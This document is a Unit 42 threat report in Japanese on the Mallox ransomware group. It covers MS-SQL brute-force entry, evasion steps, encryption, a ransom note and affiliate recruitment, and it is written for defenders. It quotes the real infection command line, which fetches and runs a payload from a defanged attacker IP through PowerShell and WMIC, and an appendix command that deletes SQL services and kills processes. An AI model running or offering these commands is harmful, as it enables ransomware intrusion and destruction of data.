脅威グループの評価: Mallox ランサムウェア

5 分で読めます

概要

Mallox (別名 TargetCompany、FARGO、Tohnichi) は、Microsoft Windows システムを標的とするランサムウェアファミリーです。このマルウェアは 2021 年 6 月から活動しており、安全でない MS-SQL サーバーを侵入ベクトルとして悪用し、被害者のネットワークを侵害することで知られます。

Unit 42 のリサーチャーは最近、MS-SQL サーバーを悪用してランサムウェアを配布する Mallox ランサムウェアのアクティビティ増加 (前年比でほぼ 174%) を観測しました。Unit 42 のインシデント対応者は、Mallox ランサムウェアがブルートフォース、データ漏出、ネットワークスキャナーなどのツールを使っているようすを観測しています。さらにこのグループはオペレーションの拡大に乗り出しており、ハッキングフォーラムでアフィリエイトを募集しているというインジケーター (指標) も確認しています。

パロアルトネットワークスのお客様は、Cortex XDRの提供する Behavioral Threat Protection や Exploit Protection を含む多層防御を通じ、本稿で取り上げた Mallox ランサムウェアおよびその技術からの保護を受けています。

Cortex が Mallox ランサムウェアの実行を阻止するようすを解説したビデオ

クラウド配信型マルウェア解析サービス Advanced WildFire は Mallox に関連するサンプルを「悪意のあるもの (malicious)」として正確に識別します。Advanced URL Filtering、DNS Securityを含むクラウド配信型セキュリティサービスは、同グループに関連するドメインを「悪意のあるもの (malicious)」として識別します。

侵害の懸念があり弊社にインシデントレスポンスに関するご相談をなさりたい場合は、こちらのフォームからお問い合わせください (ご相談は弊社製品のお客様には限定されません)。

関連するUnit 42のトピック	Ransomware

Mallox ランサムウェアの概要

Mallox ランサムウェアは、他の多くのランサムウェア脅威アクターと同様に、流行りの二重恐喝を行います。組織のファイルを暗号化する前にデータを盗み、「盗んだデータをリークサイトで公開する」と脅すことで、被害者に身代金を支払わせようとします。

下の図 1 は、Tor ブラウザー上の Mallox ランサムウェア Web サイトを示しています。組織の名前とロゴは伏せてありますが、このグループはこういうやりかたで標的から漏えいしたデータを表示します。

画像 1 は、Tor ブラウザー上の Mallox ランサムウェアギャング Web サイトのショットです。この Web サイトのタイトルは Mallox Data Leaks です。ここでは 6 つのサムネイル (モザイク処理済み) を表示しています。これらはランサムウェアギャングが投稿した被害者です。 — 図1. Tor ブラウザー上の Mallox Web サイト

各被害者には秘密鍵が与えられ、この秘密鍵を使って同グループとの対話や条件や支払いの交渉を行います。以下の図 2 は同グループとの通信に使われるチャットです。

画像 2 は、Tor 上の Web サイト上の Mallox ランサムウェアギャングのプライベートチャットのスクリーンショットです。チャットウィンドウ、顧客情報ウィンドウ、支払いの詳細、オンラインスタッフのリストがあります。会話はサポートと名前をふせた誰かとの間で行われています。ファイルが送信され、Mallox のメンバーが価格について話し合うことができると言い、名前をふせた相手から価格が決まっているかどうかを尋ねる返信があります。ここで示されている会話はこれで終了しています。 — 図2. Mallox のプライベートチャット用の Tor サイト

Mallox ランサムウェアグループは被害者が何百人もいると主張しています。実際の被害者の数はわからないままですが、弊社のテレメトリーは、製造、専門サービスおよび法律サービス、卸売および小売を含む複数の業界をまたぎ、世界中で数十人の潜在的被害者がいることを示しています。

2023 年の初め以来、Mallox のアクティビティは安定的に増加しています。弊社のテレメトリーとオープン脅威情報源から収集したデータによると、2023 年には、2022 年後半と比較して Mallox の攻撃が約 174% 増加していました (図 3 参照)。

画像 3 は、2023 年 1 月から 2023 年 6 月までの Mallox ランサムウェア攻撃試行の増加を示すグラフです。 — 図3. パロアルトネットワークスのテレメトリーに基づく Mallox の攻撃試行数の推移 (2022 年後半〜 2023 年前半)

初期アクセス

2021 年の出現以来、Mallox グループはずっと同じ方法で初期アクセスを取得しています。セキュリティで保護されていない MS-SQL サーバーを狙い、ネットワークに侵入するという方法です。攻撃は辞書のブルートフォース攻撃から始まり、MS-SQL サーバーに既知のパスワードやよく使われているパスワードのリストを試します。アクセス取得後は、コマンドラインと PowerShell を使ってリモートサーバーから Mallox ランサムウェアのペイロードをダウンロードします (図 4 参照)。

画像 4 は、Cortex XDR と Cortex XSIAM のアラートのスクリーンショットです。Alert Name (アラート名) は「Possible Brute-Force Attempt. (ブルートフォース攻撃の疑い)」で、Description (説明) には、「A user account attempted to authenticate to a target an excessive number of times in a short period. (あるユーザーアカウントが標的への認証を短期間に過剰に試みました。)This may indicate a brute force attack. (これはブルートフォース攻撃を示唆する可能性があります。)」と記載されています。 — 図4. Cortex XDR / XSIAM が Mallox ランサムウェアによる辞書型ブルートフォース攻撃に反応して生成したアラートの例

Mallox ランサムウェアが感染に使うコマンドラインの例は以下のようなものです。

"\"C:\\Windows\\\\System32\\\\cmd.exe\" /C echo $cl = New-Object System.Net.WebClient > C:\Users\MSSQLS~1\AppData\Local\Temp\updt.ps1 & echo $cl.DownloadFile(\"hxxp://80.66.75[.]36/aRX.exe\", \"C:\Users\MSSQLS~1\AppData\Local\Temp\tzt.exe\") >> %TEMP%\\updt.ps1 & powershell -ExecutionPolicy Bypass C:\Users\MSSQLS~1\AppData\Local\Temp\updt.ps1 & WMIC process call create \"C:\Users\MSSQLS~1\AppData\Local\Temp\tzt.exe\""

"\"C:\\Windows\\\\System32\\\\cmd.exe\" /C echo $cl = New-Object System.Net.WebClient > C:\Users\MSSQLS~1\AppData\Local\Temp\updt.ps1 & echo $cl.DownloadFile(\"hxxp://80.66.75[.]36/aRX.exe\", \"C:\Users\MSSQLS~1\AppData\Local\Temp\tzt.exe\") >> %TEMP%\\updt.ps1 & powershell -ExecutionPolicy Bypass C:\Users\MSSQLS~1\AppData\Local\Temp\updt.ps1 & WMIC process call create \"C:\Users\MSSQLS~1\AppData\Local\Temp\tzt.exe\""

このコマンドラインは次のことを行います。

ランサムウェアのペイロードを hxxp://80.66.75[.]36/aRX.exe からダウンロードして tzt.exe として保存する
updt.ps1 という名前の PowerShell スクリプトを実行する

その後このペイロードは次の処理を実行します (上記のコマンドラインスクリプトには示されていません)。

system.bat という名前の別のファイルをダウンロードし、これを tzt.bat として保存する
この tzt.bat というファイルを使って SystemHelp というユーザーを作成し、リモートデスクトッププロトコル (RDP) を有効にする
Windows Management Instrumentation (WMI) を使ってランサムウェアのペイロード tzt.exe を実行する

以下の図 5 は、SQL サーバーをエクスプロイトする第 1 段階のステップの 1 つを前述の Cortex XDR / XSIAM がどのように検出したのかを示すものです。

画像 5 は、Cortex XDR / XSIAM による SQL サーバーのエクスプロイトプロセスツリーのスクリーンショットです。ここには「Uncommon user management via net.EXE. (net.EXE による通常と異なるユーザー管理)」というアラート名が表示されています。 — 図5. Cortex XDR / XSIAM で SQL サーバーのエクスプロイトプロセスツリーを表示したところ。ここでは検証のため「検出のみ」のモードに設定してある

ランサムウェアの実行

このランサムウェアのペイロードは、暗号化の前に以下にあげる複数のアクションを試みることで、ランサムウェアが確実に実行されるようにします。

sc.exe と net.exe を使って SQL 関連サービスの停止・削除を試みる (完全なコマンドラインは付録を参照)。これによりランサムウェアは被害者のファイルデータへのアクセスと暗号化を行えるようになる
ボリュームシャドウを削除しようとする。これによりファイルが暗号化されたあとの復元を困難にする。このアラートが Cortex XDR / XSIAM でどのように表示されるかについては、図 6 を参照のこと

画像 6 は、Cortex XDR / XSIAM の Alert Name (アラート名) のスクリーンショットです。Alert Name は「Process request for deletion of windows, shadow copies. (ウィンドウ、シャドウコピーの削除の処理要求)」で、Category (カテゴリー) は「Tampering (改ざん)」です。 — 図6. Cortex XDR / XSIAM が生成したシャドウコピーの削除に関するアラート

Microsoft の wevtutil コマンドラインユーティリティを使い、アプリケーションログ、セキュリティログ、セットアップログ、システムイベントログを消去を試み、検出やフォレンジック分析処理を妨害する
Windows 組み込みの takeown.exe コマンドを使ってファイルのアクセス許可を変更し、cmd.exeやそのほかの主要なシステムプロセスへのアクセスを拒否する
システム管理者が bcdedit.exe コマンドを使ってシステムイメージリカバリー機能を手動でロードできないようにする
taskkill.exe を使ってセキュリティ関連のプロセスやサービスを終了をさせ、セキュリティソリューションを回避しようとする
Raccine のランサムウェア対策製品が存在する場合はそのレジストリキーを削除することでこれを回避しようとする。このプロセスの例については、図 7 参照のこと

画像 7 は、Raccine ランサムウェア対策製品をバイパスしようとするコードの数行のスクリーンショットです。 — 図7. Raccin のレジストリキーを削除している

前述のアクティビティの一部を図 8 のランサムウェアのプロセスツリーに示します。

画像 8 は、Cortex XDR / XSIAM における Mallox ランサムウェア攻撃の完全なプロセスツリーのスクリーンショットです。ツリーは最終的に 5 つのブランチに分かれます。 — 図8. Cortex XDR / XSIAM で攻撃の完全なプロセスツリーを表示したところ。ここでは検証のため「検出のみ」のモードに設定してある

今回調査した Mallox ランサムウェアのサンプルは、ChaCha20 暗号化アルゴリズムでファイルを暗号化し、暗号化されたファイルの拡張子として .malox をアペンドします。被害者の名前を拡張子として使うほか、.FARGO3、.exploit、.avast、.bitenc、.xollam などのファイル拡張子も観測されています。Cortex XDR 上で暗号化されたファイルを表示したサンプルは図 9 を参照してください。

画像 9 は、Cortex XDR の画面で、 2 つの列が表示されているスクリーンショットです。1 列目の名前は「ACTION_TYPE (アクションタイプ)」です。2 列目の名前は「FILE_NAME (ファイル名)」です。ここにあがっているファイルは、Mallox ランサムウェアによって暗号化されています。 — 図9. Mallox ランサムウェアによって暗号化されたファイルの例。Cortex XDR (「検出のみ」モードに設定) が検出したもの

Mallox は、被害者のドライブ上のすべてのディレクトリーに身代金要求メモを残します。この身代金要求メモには感染の説明と連絡先情報が記載されています。図 10 は、これらの身代金要求メモの一例です。

画像 10 は、Mallox ランサムウェアのメモの一例です。Hello, your files are encrypted and cannot be used. (こんにちは。ファイルは暗号化されているため使用できません。)To return your files in work condition you need decryption tool. (ファイルを正常な状態に戻すには、復号ツールが必要です。)Follow the instructions to decrypt all your data. (指示に従い、すべてのデータを復号してください。)Do not try to change or restore files yourself, this will break them. (ファイルが破損する可能性があるので自分でファイルを変更・復元しようとしないでください。)If you want, on our site, you can decrypt one file for free. (ご希望があれば、弊社サイトでファイルを 1 つ無料で復号できます。)Free test decryption allowed only for not valuable file with size less than 3MB. (無料のテスト復号に使えるのはサイズが 3MB 未満の価値のないファイルのみです。)How to get decryption tool: 1. (復号ツールの入手方法: 1.)Download and install Tor browser by this link [Tor link]. (このリンク [Tor リンク] から Tor ブラウザーをダウンロードしてインストールします。)2: If Tor blocked in your country and you can't access to the link use any VPN software. (2: お住まいの国で Tor がブロックされいてリンクにアクセスできない場合は VPN ソフトウェアを使ってください。)3. Run Tor browser and open the site. (Tor ブラウザーを実行し、サイトを開きます。)4. Copy your private ID in the input field. (入力フィールドにご自身のプライベート ID をコピーします。)Your private key (this portion is blurred). (あなたの秘密鍵は■■■です)。5. You will see payment information and we can make free test decryption here. (支払い情報が表示され、ここで無料のテスト復号を行えます。)Our blog of leaked companies [this is an Onion link]. 弊社のリークサイト [Onion リンク] はこちら。If you are unable to contact us through the site, then you can email us: [this is an email at onionmail[.]org.] If you are unable to contact us through the site, waiting for a response via email can be several days. (サイト経由で連絡できない場合は、次の電子メールにご連絡ください: [onionmail[.]org の電子メール]。サイト経由で連絡できない場合、電子メールでの応答には数日かかる場合があります。)Do not use it if you have not tried contacting through the site. (まずは必ずサイト経由での連絡を試してから電子メールを使ってください。) — 図10. Mallox の身代金要求メモのサンプル

実行後にマルウェアは自分自身を削除します。

オペレーション拡大へ

あるメンバーいわく、2023 年 1 月のインタビューでも述べられていたとおり、Mallox は比較的小規模で閉鎖的なグループのようです。ただしこのグループはアフィリエイトを募集し、オペレーションの拡大を図ろうとしています。

このインタビューの数日後、Mallx という名前のユーザーが、ハッキングフォーラムの RAMP に、「Mallox ランサムウェアグループは新しい Mallox ransomware-as-a-service (RaaS) アフィリエイトプログラムのアフィリエイトを募集している」と投稿しました (図 11)。

画像 11 は、ユーザー Mallx によるハッキングフォーラム RAMP への投稿のスクリーンショットです。この投稿は、Malox ランサムウェアチームにペンテスターとして参加するよう不特定多数を招待しており、特徴や条件などの応募要件のほか、利益配分やアクティブでない参加者が何を期待すべきかなどを記載しています。最後に連絡先情報を記載してあります。 — 図11 ユーザー Mallx による RAMP への投稿

遡って 2022 年 5 月には、RansomR という名前のユーザーが、有名ハッキングフォーラム nulled[.]to に「Mallox グループがチームに参加するアフィリエイトを探している」と投稿していました。スレッド内のコメントによると、2023 年 6 月時点でも参加オプションは有効のままです。

画像 12 は、ハッキングフォーラム Nulled への RansomR による投稿のスクリーンショットです。これは 2022 年 3 月に投稿されたもので、ランサムウェアスタッフ募集と書かれています。RaaS - ランサムウェアはサービスとしてのランサムウェアのことです。「すでに被害者や企業ネットワークにアクセスできる人、そのような資料を入手する方法を知っている人」を求めています。次に、Jabber と TOX、および MALLOX の連絡先情報がすべて大文字で下部に表示されています。 — 図12. RansomR による Nulled への投稿

アフィリエイトプログラムの求人活動がうまくいけば Mallox グループは勢力をのばし、より多くの組織を標的にする可能性があります。

結論

Mallox ランサムウェアグループはここ数か月活動を活発化させています。最近の求人活動で採用がうまくいけばさらに多くの組織に攻撃が広がりかねません。

各組織はセキュリティベストプラクティスを実施し、現行のランサムウェア脅威から自組織を守る準備をしてください。Mallox ランサムウェアだけでなく、日和見的なほかの犯罪グループに対しても、こうした対策をしておく必要があります。

Unit 42 チームは、インターネットに接続されているすべてのアプリケーションを適切に構成し、すべてのシステムにパッチを適用し、可能な限り最新状態であると確認することを推奨します。こうした対策をうまく使って攻撃対象領域を縮小すれば、攻撃者が利用できるエクスプロイト手法を制限できます。

XDR/EDR ソリューションを導入し、メモリー内のインスペクション (検査) を実施し、プロセスインジェクション技術を検出してください。脅威ハントを行って、「セキュリティ製品の防御回避」、「ラテラルムーブを行うサービスアカウント」、「ドメイン管理者に関連するユーザーの振る舞い」などで、異常な振る舞いの兆候が見られないか探してください。

保護と緩和策

パロアルトネットワークスの Cortex XDR は Mallox ランサムウェアが実行するファイルオペレーションやそのほかのアクティビティを検出・防止します。

画像 13 は、悪意のあるアクティビティをブロックしている Cortex XDR の通知のスクリーンショットです。 — 図13. Mallox の実行ブロックについてのエンドユーザーへの通知

画像 14 は、モジュールとファイルの変更の説明を示している Cortex XDR / XSIAM のアラートのスクリーンショットです。 — 図14. Cortex XDR / XSIAM が生成した不審なファイル変更に関するアラート。ここでは検証のため「検出のみ」のモードに設定してある

SmartScore は、セキュリティ調査手法とそれに紐づくデータをハイブリッドスコアリングシステムに変換する、ユニークな ML ベーススコアリングエンジンです。このエンジンにより、Mallox ランサムウェアに関連するインシデントは、最高レベルの重大度「100」とスコアリングされました (図 15)。このタイプのスコアリングは、アナリストがどのインシデントがより緊急であるかを判断するのに役立ち、評価理由についてのコンテキストを提供し、優先順位付けを支援します。

画像 15 は、SmartScore プログラムのスクリーンショットです。ここには、インシデント情報が評価とともにリストされ、インシデントがその重大度で評価された理由が示されます。 — 図15. Mallox ランサムウェアインシデントに関する SmartScore の情報

パロアルトネットワークス製品をご利用のお客様は、弊社の製品・サービスにより Mallox ランサムウェアに対する以下の保護が提供されています。

クラウドベースの脅威分析サービスであるWildFireは、既知のサンプルを悪意のあるものとして正確に特定します。
Advanced URL FilteringとDNS Securityは、同グループに関連するドメインを悪意あるものとして識別します。
Cortex XDRは、エンドポイント、ネットワークファイアウォール、Active Directory、IDおよびアクセス管理ソリューション、クラウドワークロードを含む複数のデータソースからのユーザーアクティビティを分析することにより、ユーザーおよびクレデンシャルベースの脅威を検出します。Cortex XDR は、機械学習を使ってユーザーアクティビティの行動プロファイルも構築します。Cortex XDRは、過去のアクティビティやピアーアクティビティ、期待される行動と新しいアクティビティとを比較することにより、クレデンシャルベースの攻撃を示唆する異常なアクティビティを検出します。Cortex XDR は本稿で取り上げた攻撃に関連し、以下の保護も提供しています。
- 既知の悪意のあるマルウェアの実行を防止するほか、ローカル分析モジュールにもとづく機械学習とBehavioral Threat Protectionによって未知のマルウェアの実行も防止します。
- Cortex XDR 3.4 から利用可能になった新たな Credential Gathering Protection を使い、クレデンシャルを収集するツールや技術から保護します。
- Cortex XDR バージョン3.4 以降の Anti-Webshell Protection を使い、脅威によるWebシェルからのコマンドのドロップや実行から保護します。
- Anti-Exploitation モジュールと Behavioral Threat Protection を使い、ProxyShell、ProxyLogon、OWASSRF を含む、さまざまな脆弱性のエクスプロイトから保護します。
- Cortex XDR Pro は、Cortex Analytics により、クレデンシャルベース攻撃を含む、エクスプロイト後のアクティビティを検出します。

侵害の懸念があり弊社にインシデントレスポンスに関するご相談をなさりたい場合は、こちらのフォームからご連絡いただくか、infojapan@paloaltonetworks.comまでメールにてご連絡いただくか、下記の電話番号までお問い合わせください(ご相談は弊社製品のお客様には限定されません)。

北米フリーダイヤル: 866.486.4842 (866.4.UNIT42)
欧州: +31.20.299.3130
アジア太平洋: +65.6983.8730
日本: +81.50.1790.0200

パロアルトネットワークスはファイルサンプルや侵害の兆候などをふくむこれらの調査結果をCyber Threat Alliance (CTA) のメンバーと共有しました。CTA のメンバーはこのインテリジェンスを使って、お客様に保護を迅速に提供し、悪意のあるサイバー攻撃者を体系的に阻害できます。詳細についてはCyber Threat Allianceにてご確認ください｡

付録

Mallox が SQL 関連サービスの停止・削除に使うコマンドライン

"C:\Windows\System32\cmd.exe" / C sc delete "MSSQLFDLauncher" && sc delete "MSSQLSERVER" && sc delete "SQLSERVERAGENT" && sc delete "SQLBrowser" && sc delete "SQLTELEMETRY" && sc delete "MsDtsServer130" && sc delete "SSISTELEMETRY130" && sc delete "SQLWriter" && sc delete "MSSQL$VEEAMSQL2012" && sc delete "SQLAgent$VEEAMSQL2012" && sc delete "MSSQL" && sc delete "SQLAgent" && sc delete "MSSQLServerADHelper100" && sc delete "MSSQLServerOLAPService" && sc delete "MsDtsServer100" && sc delete "ReportServer" && sc delete "SQLTELEMETRY$HL" && sc delete "TMBMServer" && sc delete "MSSQL$PROGID" && sc delete "MSSQL$WOLTERSKLUWER" && sc delete "SQLAgent$PROGID" && sc delete "SQLAgent$WOLTERSKLUWER" && sc delete "MSSQLFDLauncher$OPTIMA" && sc delete "MSSQL$OPTIMA" && sc delete "SQLAgent$OPTIMA" && sc delete "ReportServer$OPTIMA" && sc delete "msftesql$SQLEXPRESS" && sc delete "postgresql-x64-9.4" && rem Kill "SQL" && taskkill - f - im sqlbrowser.exe && taskkill - f - im sqlwriter.exe && taskkill - f - im sqlservr.exe && taskkill - f - im msmdsrv.exe && taskkill - f - im MsDtsSrvr.exe && taskkill - f - im sqlceip.exe && taskkill - f - im fdlauncher.exe && taskkill - f - im Ssms.exe && taskkill - f - im SQLAGENT.EXE && taskkill - f - im fdhost.exe && taskkill - f - im fdlauncher.exe && taskkill - f - im sqlservr.exe && taskkill - f - im ReportingServicesService.exe && taskkill - f - im msftesql.exe && taskkill - f - im pg_ctl.exe && taskkill - f - im postgres.exe